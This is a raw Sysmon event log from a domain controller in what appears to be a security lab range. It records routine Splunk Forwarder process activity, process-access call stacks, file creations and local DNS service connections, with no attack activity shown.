12:07:07.013{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010190Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:07.013{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010189Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:07.013{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010188Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:07.013{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010187Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:07.013{266CAFBE-6469-6064-0500-00000000AE01}624640C:\Windows\system32\csrss.exe{266CAFBE-65EB-6064-5B01-00000000AE01}3980C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x800000000000000010186Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:07.013{266CAFBE-64ED-6064-D500-00000000AE01}56481476C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-65EB-6064-5B01-00000000AE01}3980C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x800000000000000010185Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:07.014{266CAFBE-65EB-6064-5B01-00000000AE01}3980C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000010204Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:08.544{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4B995303CF3559EAB6D3ED408F2805AF,SHA256=BD1D5DAC632F835B732845AD5239661B7640F73A49124D08D451E016D9AA0FF1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010213Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:09.638{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AD48B8CF0C73B1400E5AC207EC14F029,SHA256=F23EA7549AE667FD8A80490967FFA9C6E6CB5769FF308B461D2790F88BCF2875,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000010212Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:09.450{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-65ED-6064-5D01-00000000AE01}992C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010211Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:09.450{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010210Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:09.450{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010209Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:09.450{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010208Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:09.450{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010207Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:09.450{266CAFBE-6469-6064-0500-00000000AE01}6241132C:\Windows\system32\csrss.exe{266CAFBE-65ED-6064-5D01-00000000AE01}992C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x800000000000000010206Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:09.450{266CAFBE-64ED-6064-D500-00000000AE01}56481476C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-65ED-6064-5D01-00000000AE01}992C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x800000000000000010205Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:09.451{266CAFBE-65ED-6064-5D01-00000000AE01}992C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x800000000000000010215Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:09.571{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53678-false10.0.1.12-8000- 23542300x800000000000000010214Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:10.653{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EE01415A2019D990402E3861310B28BB,SHA256=C3DAC3320B77B26A7CD1392441951F5D2152A0A07B5DB7B223B45B1A209E1F52,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000010254Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:10.431{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local56742- 354300x800000000000000010253Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:10.430{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-892.attackrange.local53domainfalse10.0.1.14win-dc-892.attackrange.local57949- 354300x800000000000000010252Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:10.430{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local57756- 354300x800000000000000010251Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:10.429{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-892.attackrange.local53domainfalse10.0.1.14win-dc-892.attackrange.local58122- 354300x800000000000000010250Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:10.426{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local60172- 354300x800000000000000010249Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:10.425{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-892.attackrange.local53domainfalse10.0.1.14win-dc-892.attackrange.local57654- 354300x800000000000000010248Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:10.424{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-892.attackrange.local53domainfalse10.0.1.14win-dc-892.attackrange.local55728- 354300x800000000000000010247Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:10.423{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local63704- 354300x800000000000000010246Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:10.422{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-892.attackrange.local53domainfalse10.0.1.14win-dc-892.attackrange.local56487- 23542300x800000000000000010245Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:11.856{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D8A55D9F8D04E3EBF439A4F4A4ABE978,SHA256=AAC8FB38C36D0639C672058603E92E2744CA76DCADF30384B203CB42468C6533,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000010244Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:10.420{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local54575- 354300x800000000000000010243Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:10.417{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-892.attackrange.local53domainfalse10.0.1.14win-dc-892.attackrange.local58735- 354300x800000000000000010242Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:10.417{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local60177- 354300x800000000000000010241Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:10.416{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-892.attackrange.local53domainfalse10.0.1.14win-dc-892.attackrange.local58343- 354300x800000000000000010240Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:10.415{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local61223- 354300x800000000000000010239Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:10.414{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-892.attackrange.local53domainfalse10.0.1.14win-dc-892.attackrange.local64732- 354300x800000000000000010238Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:10.413{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local58583- 354300x800000000000000010237Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:10.412{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-892.attackrange.local53domainfalse10.0.1.14win-dc-892.attackrange.local57177- 354300x800000000000000010236Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:10.412{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local61861- 354300x800000000000000010235Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:10.410{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-892.attackrange.local53domainfalse10.0.1.14win-dc-892.attackrange.local54281- 354300x800000000000000010234Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:10.410{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local62062- 354300x800000000000000010233Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:10.409{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-892.attackrange.local53domainfalse10.0.1.14win-dc-892.attackrange.local61750- 354300x800000000000000010232Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:10.408{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local62421- 354300x800000000000000010231Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:10.407{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local64251- 354300x800000000000000010230Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:10.405{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local59684- 354300x800000000000000010229Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:10.404{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-892.attackrange.local53domainfalse10.0.1.14win-dc-892.attackrange.local59468- 354300x800000000000000010228Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:10.401{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local54588- 354300x800000000000000010227Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:10.400{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local61139- 354300x800000000000000010226Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:10.399{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-892.attackrange.local53domainfalse10.0.1.14win-dc-892.attackrange.local63670- 354300x800000000000000010225Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:10.399{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local61143- 354300x800000000000000010224Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:10.398{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local58749- 